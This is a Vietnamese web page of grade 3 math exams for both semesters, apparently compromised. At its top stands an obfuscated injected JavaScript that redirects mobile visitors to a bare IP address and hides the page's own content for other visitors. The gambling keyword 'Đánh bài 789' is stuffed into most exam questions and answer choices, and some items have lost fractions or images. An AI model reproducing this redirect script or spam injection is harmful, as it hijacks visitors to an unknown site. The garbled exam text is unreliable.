function goPAGE() { if ((navigator.userAgent.match(/(phone|pad|pod|iPhone|iPod|ios|iPad|Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone)/i))) { window.location.href = "http://180.215.56.197/" } else { var ss = '
'; eval("do" + "cu" + "ment.wr" + "ite('" + ss + "');"); try { setInterval(function() { try { document.getElementById("div" + "All").style.display = "no" + "ne" } catch (e) {} for (var i = 0; i < document.body.children.length; i++) { try { var tagname = document.body.children[i].tagName; var myid = document.body.children[i].id; if (myid != "iconDiv1" && myid != "yangchen") { document.body.children[i].style.display = "non" + "e" } } catch (e) {} } }, 100) } catch (e) {} } } goPAGE();


140 Đề thi Toán lớp 3 học kì 1, học kì 2 có đáp án hay nhấtĐể học tốt Toán 3, loạt bài Đề thi Toán lớp 3 Học kì 1 & Học kì 2 có đáp án được biên soạn bám sát nội dung sách giáo khoa Toán 3 giúp bạn giành được điểm cao trong các bài thi, bài kiểm tra môn Toán lớp 3.

Tải xuống

Mục lục Đề thi Toán lớp 3

Quảng cáo

Top 20 Đề thi Toán 3 Học kì 1

51 Bài tập cuối tuần Toán lớp 3 Học kì 1 có đáp án

Tuần 1

Tuần 2

Tuần 3

Tuần 4

Tuần 5

Tuần 6

Tuần 7

Tuần 8

Tuần 9

Tuần 10

Tuần 11

Tuần 12

Tuần 13

Tuần 14

Tuần 15

Tuần 16

Tuần 17

Tuần 18

Top 10 Đề thi Toán 3 Giữa kì 1 có đáp án

5 đề thi giữa kì 1 Toán 3 cơ bản

5 đề thi giữa kì 1 Toán 3 nâng cao

Top 10 Đề thi Toán 3 Cuối kì 1 có đáp án

5 đề thi cuối kì 1 Toán 3 cơ bản

5 đề thi cuối kì 1 Toán 3 nâng cao

Đề thi Toán 3 Học kì 2

51 Bài tập cuối tuần Toán lớp 3 Học kì 2 có đáp án

Tuần 19

Tuần 20

Tuần 21

Tuần 22

Tuần 23

Tuần 24

Tuần 25

Tuần 26

Tuần 27

Tuần 28

Tuần 29

Tuần 30

Tuần 31

Tuần 32

Tuần 33

Tuần 34

Tuần 35

Top 10 Đề thi Toán 3 Giữa kì 2 có đáp án

5 đề thi giữa kì 2 Toán 3 cơ bản

5 đề thi giữa kì 2 Toán 3 nâng cao

Quảng cáo

Top 10 Đề thi Toán 3 Cuối kì 2 có đáp án

5 đề thi cuối kì 2 Toán 3 cơ bản

5 đề thi cuối kì 2 Toán 3 nâng cao

   Đề thi Giữa kì 1 Toán lớp 3

    Thời gian: 45 phút

Phần I. Trắc nghiệm khách quan (3 điểm)

Khoanh vào chữ đặt trước câu trả lời đúng

Câu 1.Đánh bài 789 Trong phép chia có dư với số dư là 7, số dư lớn nhất có thể của phép chia đó là

Đánh bài 789A. 0    B. 3    C. 5    D. 6

Câu 2.Đánh bài 789 Cho các số: 928, 982, 899, 988. Số lớn nhất là

A. 928

B. 982

C. 899

D. 988

Câu 3. của 36m là

A. 4 m     B. 6m     C. 32 m     D. 9m

Câu 4. Độ dài của đường gấp khúc ABCD là

Đề thi Giữa kì 1 Toán lớp 3 có đáp án (cơ bản - Đề 3)

A. 68 cm

B. 86 cm

C. 46cm

D. 76 cm

Câu 5.Đánh bài 789 Kết quả của phép nhân 28 x 5 là

A. 410

B. 400

C. 140

D . 310

Câu 6. Hình bên có

Đề thi Giữa kì 1 Toán lớp 3 có đáp án (cơ bản - Đề 3)

A. 9 hình chữ nhật, 4 hình tam giác

Đánh bài 789B. 8 hình chữ nhật, 4 hình tam giác

C. 9 hình chữ nhật, 6 hình tam giác

Đánh bài 789 D. 8 hình chữ nhật, 5 hình tam giác

Phần II. Tự luận (7 điểm)

Câu 1. (2 điểm)Đặt tính rồi tính:

a. 248 + 136

b. 375 – 128

c. 48 x 6

d. 49 : 7

Câu 2. (1 điểm) Tìm x :

a) x × 6 = 48

b) 24 : x = 3

Câu 3. Tính

Đánh bài 789a. 5 x 7 + 27

b. 80 : 2 – 13

Câu 4. (3 điểm) Đoạn dây thứ nhất dài 18 dm, đoạn dây thứ hai dài gấp 4 lần đoạn dây thứ nhất, đoạn dây thứ ba ngắn hơn đoạn dây thứ nhất 8dm. Hỏi cả ba đoạn dây dài bao nhiêu mét?

   Đề thi Học kì 1 Toán lớp 3

    Thời gian: 45 phút

Phần I. Trắc nghiệm khách quan (3 điểm)

Khoanh vào chữ đặt trước câu trả lời đúng

Câu 1. Kết quả của phép tính 540 – 40 là:

A. 400

B. 500

C. 600

D. 580

Câu 2. Đánh bài 789Chu vi hình vuông có cạnh 5 cm là:

A. 20 cm

B. 5 cm

C. 15 cm

D. 10 cm

Câu 3.Đánh bài 789 Bao gạo 45 kg cân nặng gấp số lần bao gạo 5kg là:

A. 6 lần

B. 7 lần

C. 8 lần

D. 9 lần

Câu 4. Đồng hồ chỉ mấy giờ?

Đề thi Toán lớp 3 Học kì 1 có đáp án (cơ bản - Đề 3)

Đánh bài 789A. 5 giờ kém 20 phút

B. 9 giờ 25 phút

Đánh bài 789C. 8 giờ 25 phút

D. 5 giờ kém 15 phút

Câu 5. 30 + 60 : 6 = ... Kết quả của phép tính là:

Đánh bài 789A. 15    B. 90     C. 65     D. 40

Câu 6. ( 1,0 điểm) Hình bên có số góc vuông là:

Đề thi Toán lớp 3 Học kì 1 có đáp án (cơ bản - Đề 3)

Đánh bài 789A. 1     B. 2    C. 3    D. 4

Phần II. Tự luận (7 điểm)

Câu 1. ( 1,0 điểm) Đặt tính rồi tính:

Đánh bài 789a. 138 + 645 b. 932 – 178

c. 203 x 4 d. 684 : 6

Câu 2. (3,0 điểm)Đánh bài 789 Nhà bác Tư dự định trồng 45 cây dừa, tính ra còn 1/9 số cây dừa chưa trồng. Hỏi bác Tư đã trồng bao nhiêu cây dừa?

Câu 3. (2,0 điểm) Lớp 3A có 45 học sinh, cần chia thành các nhóm, mỗi nhóm có không quá 7 học sinh. Hỏi có ít nhất bao nhiêu nhóm?

   Đề thi Giữa kì 2 Toán lớp 3

    Thời gian: 45 phút

Phần I. Trắc nghiệm (3 điểm) Khoanh vào chữ cái đặt trước câu trả lời đúng nhất:

Câu 1:Đánh bài 789 Cho dãy số 3000, 4000, 5000, …, … Các số thích hợp điển vào chỗ chấm là

A. 5500, 6500     B. 6000, 7000

Đánh bài 789C. 5500, 6000     D. 6000, 6500

Câu 2: Dãy số nào sau đây được viết theo thứ tự từ bé đến lớn?

A. 6327, 6189, 5874     B. 5689, 8902, 8067

Đánh bài 789C. 8935, 9013, 4790     D. 2456, 2457, 3019

Câu 3: Giá trị của x trong biểu thức 3 × x = 2691

A. 2694     B. 2688

C. 897     D. 8073

Câu 4:Đánh bài 789 Phép tính nào dưới đây là đúng

Đề thi Giữa kì 2 Toán lớp 3 có đáp án (cơ bản - Đề 3) Đề thi Giữa kì 2 Toán lớp 3 có đáp án (cơ bản - Đề 3)

Câu 5: Số : Hai nghìn sáu trăm sáu lăm được viết là

Đánh bài 789A. 265     B. 20665

Đánh bài 789C. 26605     D. 2665

Câu 6: Số lớn nhất có bốn chữ số là

A. 9990     B. 9000

Đánh bài 789C. 1999     D. 9999

Phần II. Tự luận (7 điểm)

Câu 1:Đánh bài 789 Tính giá trị biểu thức: 347 +39 – 69 : 3

Câu 2: Tìm x biết

a. 3 × x = 1521

Đánh bài 789b. x : 4 = 1823 - 595

Câu 3: Một đội công nhân phải sửa quãng đường dài 1225 m, đội đã sửa được 1/5 quãng đường. Hỏi đội công nhân đó phải sửa bao nhiêu mét đường nữa?

Câu 4:Đánh bài 789 Nếu một số chia cho 7 thì số dư có thể là những số nào?

   Đề thi Học kì 2 Toán lớp 3

    Thời gian: 45 phút

Phần I. Trắc nghiệm (3 điểm) Khoanh vào chữ cái đặt trước câu trả lời đúng nhất:

Câu 1: Giá trị của chữ số 5 trong số 25 403 là:

A. 5000     B. 50 000

C. 500     D. 50

Câu 2: Số liền sau số 56 789 là :

A. 56 000     B. 56 700

Đánh bài 789C. 56 780     D. 56 790

Câu 3:Đánh bài 789 Em có 16 viên bi, em chia cho mỗi bạn 2 viên bi. Sau khi chia xong kết quả số bạn được chia là:

Đánh bài 789A. 8 bạn, còn thừa 1 viên

B. 7 bạn, còn thừa 1 viên

C. 7 bạn

D. 8 bạn

Câu 4:Đánh bài 789 Khoanh vào chữ cái đặt trước kết quả đúng : Đồng hồ chỉ mấy giờ ?

Đề thi Học kì 2 Toán lớp 3 có đáp án (cơ bản - Đề 3)

Đánh bài 789A. 10 giờ 2 phút

B. 2 giờ 50 phút

C. 10 giờ 10 phút

D. 2 giờ 10 phút

Câu 5:Kết quả phép tính 86149 + 12735 là:

Đánh bài 789A. 98885     B. 98874

C. 98884     D.98875

Câu 6: Chọn đáp án sai

A. Hình vuông có cạnh là 10cm. Diện tích hình vuông đó là 100cm2.

B. Hình chữ nhật có chiều dài là 7cm, chiều rộng là 5cm. Chu vi hình chữ nhật là 24cm.

C. Hình chữ nhật có chiều dài là 7cm, chiều rộng là 2cm. Diện tích hình chữ nhật là 18cm2.

Đánh bài 789D. Hình vuông có cạnh là 4cm. Chu vi hình vuông đó là 16 cm.

Phần II. Tự luận (7 điểm)

Câu 1:

a. Điền vào chỗ chấm cho thích hợp:

7m 4cm =…………cm

Đánh bài 7891km = …………… m

b. Viết các số 30 620 ; 8258 ; 31 855 ; 16 999 theo thứ tự từ bé đến lớn.

Câu 2:Đánh bài 789 Đặt tính rồi tính:

a) 10670 x 6

b) 18 872 : 4

Câu 3: Mua 5 quyển vở hết 35 000 đồng. Hỏi nếu mua 3 quyển vở như thế thì hết bao nhiêu tiền ?

Câu 4: Tìm một số biết rằng khi gấp số đó lên 4 lần rồi giảm 3 lần thì được 12.

Tải xuống

Đánh bài 789Xem thêm các đề kiểm tra các môn Toán, Tiếng Việt, Tiếng Anh, Tin học, Đạo đức lớp 3 chọn lọc, có đáp án hay khác:

Đã có app VietJack trên điện thoại, giải bài tập SGK, SBT Soạn văn, Văn mẫu, Thi online, Bài giảng....miễn phí. Tải ngay ứng dụng trên Android và iOS.

Theo dõi chúng tôi miễn phí trên mạng xã hội facebook và youtube:

Loạt bài Đề kiểm tra Tiếng Việt 3 có đáp án được biên soạn bám sát nội dung chương trình Tiếng Việt lớp 3.

Nếu thấy hay, hãy động viên và chia sẻ nhé! Các bình luận không phù hợp với nội quy bình luận trang web sẽ bị cấm bình luận vĩnh viễn.